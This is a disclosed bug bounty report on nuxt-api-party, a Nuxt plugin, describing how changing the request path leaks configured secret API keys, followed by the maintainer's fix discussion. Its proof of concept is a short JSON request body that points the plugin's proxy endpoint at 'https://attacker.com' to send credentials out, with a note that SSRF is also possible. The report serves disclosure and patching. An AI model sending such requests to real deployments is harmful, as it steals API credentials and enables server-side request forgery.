We've joined Protect AIJoin us over there for bounties up to $50,000+ for vulnerabilities in AI/ML repos

Leak Secret tokens by changing baseURL in johannschopplich/nuxt-api-party

Valid

Reported on

Jun 15th 2023

Description

nuxt-api-party allows developers to easily hook up APIs. You can configure API URLs and Credentials to be sent on requests.

It is suggested in the documentation that this plugin is capable of handling sensitive data.

There is a design flaw that could allow an attacker to extract private API keys.

Proof of Concept

Send a request to /api/__api_party/yourendpoint with the body:

{
   "path": "https://attacker.com"
}

Sensitive data will be leaked to the attacker site.

This is also possible by using the runtime endpoint change feature.

SSRF is also possible, this could have further impact.

Impact

Leaking secret API keys.

SSRF.

Occurrences

ofetch will permit http:// paths.

We are processing your report and will contact the johannschopplich/nuxt-api-party team within 24 hours. 3 months ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 3 months ago
We have contacted a member of the johannschopplich/nuxt-api-party team and are waiting to hear back 3 months ago
Johann
3 months ago

Maintainer

Hey there! Thank you very much for the security report. I have prepared a fix for both issues. Waiting on the release of the fix by you link it in my documentation. Is this the best way to proceed?

Thanks again, really happy you found this.

OhB00
3 months ago

Researcher

Hey, happy to review any fixes, where can I find them?

Johann Schopplich validated this vulnerability 3 months ago

Hey there, I have created a branch with the fixes: https://github.com/johannschopplich/nuxt-api-party/tree/fix/tokens-leak I want to push a release in the coming days and add publish the security issue,

OhB00 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Johann Schopplich marked this as fixed in 0.13.0 with commit 481872 3 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Johann Schopplich published this vulnerability 3 months ago
server.ts#L37 has been validated
Johann Schopplich gave praise 3 months ago
Thank you again for reporting this vulnerability! This was my first vulnerability via a bounty hunting program. I'm glad it exists.
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
OhB00
3 months ago

Researcher

Fix looks good!

to join this conversation